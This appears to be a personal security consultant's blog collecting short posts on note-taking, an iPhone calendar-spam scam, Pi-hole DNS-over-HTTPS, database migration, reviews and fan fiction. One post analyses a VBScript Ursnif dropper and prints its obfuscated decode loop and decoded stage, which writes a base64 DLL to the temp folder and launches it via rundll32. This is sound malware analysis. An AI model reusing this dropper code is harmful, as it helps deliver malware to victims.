Skip to main content

/ˈpeːtər/, n • Security consultant at Atos • Dutch computer geek • Living together with Christina and father of 3 boys • Opinions are my own • He/him

Personal notes migrated to Joplin

1 min read

I was puzzling for a while how to handle my personal notes, primarly in the terminal in the various systems, jsut being able to find certain procedures I use to upgrade which I can't remember from memory.

As an additional issue I still had my personal notes included in Microsoft Onenote and had the notes file stored on my owncloud instance.

So after browsing around I found Joplin which covers most of my needs, the only thing is that Joplin works best if you know Markdown, which basically I do, but this could be a limitation.

So for now this is my personal notes solution having the Windows app installed on 3 workstations, my iPhone and on 2 unix systems. 

iPhone calendar abuse

2 min read

I actually fell for this attack to use the iPhone calendar to create notifications to get me to click on the link. I wasn't aware of this vector before via the iPhone calendar. I know this is done via gmail's calendar.

browsing a littel around I visited a site and got redirected to a web page and it gave me a pop-up to  update my calendar, I was still lying in bed that morning so was not careful with touching the screen so ticked on allow 😒.

I don't use the iPhone internal calendar so was not to worried, and checked it briefly but didn't see anything right away so just parked it in my head as something to look into at a later stage.

fast forward two days and in the evening I get the following pop-up: 

And I remember me allowing the site adding stuff to my calendar. So I decide to check this a little and try to clean-up the mess that was stil pending. So looking at my calendar I see that evening 4 reminders and as you can see in below screenshot 10 additional reminders.

I just updated my iPhone to iOS 13.6 so all known exploits where fixed and I assumed that for this they would probably not going to waste a zeroday on this 😄.

so clicking the link to I get the kinda normal scare screen and press Close link


And I get the pretty decently created recreated page to install a VPN-app, not sure how that is going to help me with the virus but who cares 🤷

If you click 'verwijder alle virussen' or wait the 2 minutes you get redirected to install the following app. And I assume here the money is created if the app gets installed with there affiliate code they make some money. Interesing detail though is that Savestock is not a VPN are antivirus app.


Recovering from this wasn't that big of a deal although I needed to google to find how to remove a calendar subscription. 

"Tap Settings > Accounts & Passwords > Subscribed Calendars" there you find the calendars you are subscribed to. In this case the "CLICK SUBSCRIBE..."

And then delete the account

Short VisualBasic #Ursnif dropper write-up

3 min read

Here is my first post of a short investigation into a malicious script that I came across.

The sample was posted to the list. This is probably part of a phising mail which directs you to download the zip file and open it.

When you do this, the VisualBasic script inside the zip archive will typically be launched and the encoded payload will be executed on the system.

After unzipping we can have a first look at the .vbs script

The malicious script:

  • A large string ending in "AAAAMAAQqVT" I'm already assuming a reversed PE executable, when you base64 encode the MZ header it results in something like TVxx.
  • Two arrays
  • A short code block to decode the array's in something useful
for tzZFStIadHqvhzdvlvlbpEXDSYhoiHcgeDgEKN = lbound(wGPjfJzXJQxGLsJWnaUekdibWhoIi) to ubound(dVMYfYdJEGreGsr) : YVlUhhqxZMAvjAYHiFNxxrkWWvzkbiFf = chr(sqr(wGPjfJzXJQxGLsJWnaUekdibWhoIi(tzZFStIadHqvhzdvlvlbpEXDSYhoiHcgeDgEKN)) - sqr(dVMYfYdJEGreGsr(tzZFStIadHqvhzdvlvlbpEXDSYhoiHcgeDgEKN))) : HoVEFmZZVAZqcifFckqTROBxVyUmGActyC = HoVEFmZZVAZqcifFckqTROBxVyUmGActyC & YVlUhhqxZMAvjAYHiFNxxrkWWvzkbiFf : next : execute(HoVEFmZZVAZqcifFckqTROBxVyUmGActyC)

A little rewriting and making it saver by echo the output instead of execute it, results in the following VBS code :

for Value = lbound(ArrayOne) to ubound(ArrayTwo)
    Result = chr(sqr(ArrayOne(Value)) - sqr(ArrayTwo(Value)))
    ConcatResult = ConcatResult & Result
WScript.Echo ConcatResult

Running this result in the following script.

on error resume next
set WshShell = CreateObject("WScript.Shell")
Set FSO = CreateObject("Scripting.FileSystemObject")
Path = WshShell.ExpandEnvironmentStrings("%TEMP%") & "\Adobe.url"
set oUrlLink = WshShell.CreateShortcut(Path)
oUrlLink.TargetPath = ""
if  (FSO.FileExists(Path))  Then
    WScript.Echo "Error!"
    xml = "Msxml2.DOMDocument"
    ws = "WScript.Shell"
    bin = "bin.base64"
    sa = "shell.application"
    bs = "base64"
    db = "Adodb.Stream"
    Set wshs = createobject(ws)
    Set sh = createobject(sa)
    filepath = wshs.ExpandEnvironmentStrings("%TEMP%") & "\SHCSdw.dll"
end if

Set oXML = CreateObject(xml)
Set oNode = oXML.CreateElement(bs)
oNode.dataType = bin
oNode.text = strreverse(code)

Set BinaryStream = CreateObject(db)
BinaryStream.Type = 1
BinaryStream.Write oNode.nodeTypedValue
BinaryStream.SaveToFile filepath
sh.ShellExecute "cmd.exe", "/c everybody shit fuck & runDll32 "& filepath &",DllRegisterServer", "", "open", 0

The script places a Adobe.url in the temp folder pointing to
and it like I already suspected does a string reverse on the code variable - strreverse(code)
passing this via the base64 decoder resullts in a PE executable on the filesystem in your temp folder with the name SHCSdw.dll

The dropped file SHCSdw.dll is a Ursnif sample that was compiled at 2020-02-24 09:57:57, if you can believe this data. The sample is available in Virustotal.


File Type sha256 Zip archive data bde9ee61351d9c61ddf2e7fc382426a5301f1155e1197f2a3d47468db4486d9c
dokument9055.vbs VisualBasic script 98b3160c553c229cb9be77de3791398aed3cce79e7935d96db9e32bf353b9624
SHCSdw.dll PE32 executable (DLL) bc8da5ad4010226376c376b2d164cfa4e073a0f6ef7761e9f4864a46a8cb9b32

Sandworm: A New Era of Cyberwar and the Hunt for the Kremlin's Most Dangerous Hackers by Andy Greenberg

1 min read

Sandworm: A New Era of Cyberwar and the Hunt for the Kremlin's Most Dangerous Hackers

Sandworm: A New Era of Cyberwar and the Hunt for the Kremlin's Most Dangerous Hackers by Andy Greenberg
My rating: 5 of 5 stars



It came recommended in the Darknet Diaries Podcast ep 54: Notpetya by Jack Rhysider.
And as far as I'm concerned this is a must read for anyone working in Cybersecurity. It gives so much detail about the Russian government hacking techniques and motivations.
I already knew most of the separate attacks described in the book but getting the big picture how all these are related is an eye opener.

View all my reviews

DNS-over-HTTPS in the Pi-hole

1 min read

On the Raspberry pi install the dnss package

apt install dnss

Edit the settings to make it listsn on port 5053, normally it listens on 53

vi /etc/systemd/system/

# Sockets for dnss.
# This lets dnss run unprivileged.
# We typically want one UDP and one TCP socket.



And restart the service, because the pi-hole is running starting probably failed right after installation, port 53 is in use

systemctl restart dnss.socket

In the Pi-hole admin web interface under settings find the tab DNS and adjust the upstream DNS Server to the dnss installation

Pi-Hole - Upstream DNS Servers

And we're good to go. dnss uses by default



CPE Webcasts and Podcasts

1 min read

Since I'm a certified CISSP I need to reach my yearly CPE goal. For this I watch and listen to various web- and podcast. At the moment this is what is on my diet.

Stormcast, Daily Information Security Podcast - Stormcasts are daily 5-10 minute information security threat updates from the SANS Internet Storm Center.

Digital Shadows ShadowTalk - Digital Shadows monitors and manages an organization’s digital risk, providing relevant threat intelligence across the widest range of data sources within the open, deep, and dark web to protect their brand, and reputation.

Troy Hunt's Weekly update - Troy Hunt is the owner of Have I been pwned? (HIBP), blogger, Microsoft regional director and MVP and speaks at security events and give security training.

Paul’s Security Weekly - Weekly security roundup by the security weekly team discussing the security high- and lowlights.

FireEye State of The Hack - Weekly (?) show by FireEye with your update of the various APT and FIN groups.


1 min read


Can't resist putting these on my site, much better attempt than my picture below.
These pictures are created by @paul_pearce

Migrating Known from MySQL to PostgreSQL

1 min read

Below are the steps I've taken to finally migrate my self hosted Known site from MySQL to PostgreSQL.

Currently the website install routine only supports MySQL so there is no need to go to either the /warmup or /begin folders on your site. You need to build that database manually.

createuser withknown

createdb -T template1 -O withknown withknown

psql -f /schema/postgres/postgres.sql withknown

To migrate the data from MySQL to PostgreSQL I use the mysql2postgresql tool from Mihail Shumilov

mysqldump --xml -u root withknown > withknown.xml

php convertor.php -i withknown.xml -o withknown.sql

Edit the file withknown.sql and remove all the DROP, CREATE, ALTER lines so you are left with only the INSERT lines, which hold the actual site data. (perhaps there is a option in mysqldump to do this directly)

To get rid of the over escaping from MySQL run the below sed line.

cat withknown.sql | sed -e 's/\\\\/\\/g' > withknown-final.sql

As last phase import the data in PostgreSQL

sql -U withknown -f withknown-final.sql withknown

Make sure you update the config.ini and change the connection info

database = 'Postgres'

dbname = 'withknown'

dbpass = 'XXX'

dbuser = 'withknown'

dbhost = 'localhost'

Zolt - Daily news summaries for the US

2 min read



As request to me by Nick Wyatt I gave the app Zolt a try.

Zolt lets you quickly skim through the they daily news by reading 500 news sources and currating the best stories and summarizing them in sixty words. All these stories are presented via simple to read cards that you can quickly swipe through. Also the app lets you create your personal newsfeed, so If you like technology and sports you can include those in your personal feed and read that and stay up to date.

So after trying Zolt for a short time I must say I really like the minimalistic design and technical implementation. Also the sharing options from the app are great being able to us the shout icon and respond to the post with a text, drawing or photo is a nice feature. For me the biggest drawback is the content.

Zolt is clearly a US minded application and you will find this clearly in the news items. Even in the international section 8 out of the 10 news stories is about the US. So for me as someone from Europe this doesn't forfill my need for news en though the presentation and ease of consuming the content is great.

If you want to give it a try yourself the app is available for free on both Android and iOS.

The Explorations of Obsidius #Ingress

7 min read

I. It was my honor to serve under Titus as a member of the exploratores, the scouting troops, during the campaign in Judea. It was my fortune to have my commander and future emperor take notice of some novel tactics that I employed and name me Prime Exploratore, placing several soldiers(who had been deemed unfit for combat services) under my command. Titus, always wise and innovative, knew that they had value far beyond that of the traditional exploratores or spies(a word which I detest): they were to be different. I preferred the term Irregular Scout.

II. My small force numbered no more than twenty at any given time, with new recruits substituting for the many who had been captured or killed. They included three types of soldiers: those that were fleet of foot and agile, and thus able to scout large amounts of terrain in the distance; those who were able to blend into different social groups(which was very valuable in the Judea campaign) feigning other identities; and those who were able to impersonate noble personages for the purposes of gaining information. Personally, I had adopted all of these roles at different times and thus had a body of knowledge to share, and my Exploratores were quick to learn.

III. It was to my advantage that I was of average height and possibly mixed heritage. Possibly because, while my mother denies this, my features have always been undeniably different, and some have said that they belonged not to my father but to a gladiator from the east or perhaps Egypt with whom she dallied. My father, Marcus Atticus Tullius, was a merger of unfashionable but nonetheless well established republican families: Tullius being one of Marcus Tullius Cicero's relatives and Atticus being the famous statesman, also known as Cicero's correspondent. Atticus was quite possibly the most adroit politician of the age given that he died of natural causes in a treacherous political environment. As a youth I journeyed to Egypt, following a trail I thought might lead me to the truth of my parentage, but my own history remained oddly and irrevocably occluded. Whatever my lineage, I was gifted with the ability to appear to be the member of many tribes. With this gift, and the skills of both the traditional Exploratores and the Speculatores, I soon became something else altogether different.

IV. Raised in Judea, I spoke several languages and was familiar with the world of rough traders who traveled to distant and un-imagined lands. In fact, as a child, I snuck off with a caravan, pretending to be a stable boy and made it deep into Persia before my true identity was discovered. I immediately returned. My family was perceived as quite powerful and thus dangerous in the region. My father served as a member of the royal cavalry (known later as the Praetorian Guard) and was present for the murder of Caligula. He was on of the few who survived the barbarous and vengeful actions of the German Guard upon the death of the debauched emperor.

V. This is fortunate for me, because I was born two years later. Feeling it safer to be in the East, my father accepted a posting there, It afforded me an upbringing of provincial privilege and exposure to the most exotic elements of the East, West, South and North (as Judea had strategic importance as the trail-head of nearly all trading routes from the far Persian, Egyptian and African, the as well as Hellenic, Latin and Assyrian Regions). In short, I was exposed to the entire world. This gave me great knowledge to use later in life.

VI. I served Titus in Judea an attempted to serve those I'd grown up with as well. I credit myself in saving many lives in the Jewish Wars, but alas, there was no persuading some of them that attempts to flight the empire within force would not be successful. I suspect that the offshoot sect will be more effective in subverting the empire from within. After Judea I was sent north to battle with the German. I was an utterly new challenge. I had no experience in dealing with the Ice and Forest People. With no hope of blending in, I had to survive in the water. Few can sim in the north as id would be pointless for most months of the year.

VII. There, in the forest I was able to locate a well concealed enemy encampment. However, before I could return to share this information, I as captured, set to be executed and encountered a man who would change my life. His name was Valadian. He had achieved some status as a holy man or shaman or priest amongst the Barbarians. He came to me while I was caged in the rude forest outpost and asked one simple question: How had i discovered their hidden camp? What had led me there? I told him that I did not know. I had felt the pull of the Earth. I had followed an enemy.

VIII. He had me released from the cage and told me he wanted to follow the energy further. I saw no risk in doing as I had already been sentenced to dand finr the Oracle eath in a most ghastly manner (the Germanic Tribes excelled in this, frankly making our methods of execution look tame in comparison). I led him deep into the forest and we found ourselves standing amidst some ancient ruins. They were incredible to behold. Alive in some way that I cannot explain. After some silence, Valadian told me that I would be spared and that he would have great use for me inf I would agree to honor the debt of my life when I returned to Roman lands. Having little choice, I agreed. I was now bound by oath.

IX. In truth, I was as fascinated by Valadian as he was by me, most notably because he possessed a Roman name though he was clearly a German. He told me to find my way to North Africa amidst the ruins of Carthage and find the Oracle of those parts who would direct me to one known as The Magnus. There was no way I could reject this. My journey would take me not only to Rome, but to Egypt and North Africa. However, when I reached Rome again, I reported to Titus to tell him of my adventures in Germania, and upon the mention of Valadian, Titus dismissed this guards and secretary and asked to speak to me alone.

X. He told me to carry out the mission of Valadian and tell no-one of it and should meet the one known as Magnus, to send his regards. And then he, the son of the Now Emperor of Rome who would himself rule magnificently, if briefly, said something that would echo through the rest of my life: "For all of the blessings Jupiter has bestowed on me, I did not get yours. However, I did sense something and it was confirmed to me by Berenice on the one occasion when you were in her presence. Like you, she often traveled in disguise, for reasons we need not discuss here. What is more, she described you as 'Sensitiva'. Or that was the best translation to Latin that she could offer." He gave me a letter of transit through the Empire ans assigned a loyal Numidian guide by the name of SYPHAX, as well as bestowing a generous number of Sesterii.

XI. When I arrived in North Africa, I realized that no one knew the exact location of the Oracle, and that the Oracle could only be found by uncovering the hallowed sanctuary where she dwelled. My guide was of no use, save to keep me out of dangerous lands and provide some local knowledge. I realized that I would have to find the Oracle myself. The task proved to be quite simple. I realized that it was yet another test of my special skills.

Scream Fortress 7

1 min read

Scream Fortress

I didn't expect to change the theme of Team Fortress already, I started just actively playing at the start of the Invasion community upgrade. But ofcourse with Halloween around the corner Scream Fortress is released.

More information on this realease can be found on the official Scream Fortress site 

Cyber security from the get go

1 min read

With the current security climate it is important to start each project either a newly build application mobile, web or otherwise, with security in mind. This means personnel with security training should be involved on all levels from the get go. Even people on sales team , project management and of course architects and developers should have security in mind.

On a lot of occasion security is still an afterthought that needs to be arranged a few weeks for the intended go live of the environment and any security findings in that environment need to be fixed during those last few days when there is hardly time and/or funding left. I have seen application releases getting delayed and worse applications being deployed with security issues that need to be fixed with the first hotfix.

So it is pivotal that on all level of the organisation the need an urgency of cyber security policies and procedures are implemented before the next project starts.


- posted as "Peer Review: Discussion -- Role of Cyber Security" at Coursera

Playing around with Hortonworks hadoop

1 min read

Going through some of the Hortonworks tutorials to see how a Hadoop environment works.


I already achieved some successes and I'm stubborn enough not to follow the tutorials to the letter. So I imported a dataset from the KNMI holding the average day temperature since 1950.


This first Pig script is to get the average temperature of Eelde according to the dataset.


Apparently the answer to this query is 8.943 degrees Celsius.


and a small adjustment to the query learns that the maximum temperature was 27.7 degrees Celsius

fighting the POODLE

1 min read

I updated my nginx configuration a little earlier to day to make sure that we are not a possible victim of a POOBLE attack on SSLv3 protocol of TLS. As you can read here in CVE-2014-3566 and if you want you can also read the full details of the vulnerability here (PDF)

But it is good to know I still have my 'A' rating at the site Qualys SSL Labs


Bacula Storage daemon for Readynas Duo

1 min read

I couple of days ago I found that the old bacula-sd daemon was no longer accepting backups from my central backup server. The Backup server runs version 7.0.4 and the storage daemon was still 5.0.3

Because building is a bit tricky I wanted to share the basic steps to the get this done.

  • Download the Qemu development environment from Readynas Forum.
  • Download the PostgreSQL version used on the director, build and install PostgreSQL

            cd postgresql

            ./configure && make && make install

  • Download the matching Bacula and build and install it in a dummy root directory

            cd bacula

            ./configure --enable-build-dird=no --with-postgresql=/usr/local/pgsql


            make install DESTDIR=/root/dummy

  • The complete install tree should now be in /root/dummy I trimmed this to only hold bacula-sd and bacula-fd but if you need more tools on the readynas you can keep them in here.
  • The final step is to copy everything to the Readynas. my preferred method is via a a tar archive

1 min read

View from the office (at Atos)

1 min read

M'n nieuwe auto gekregen via de post 😄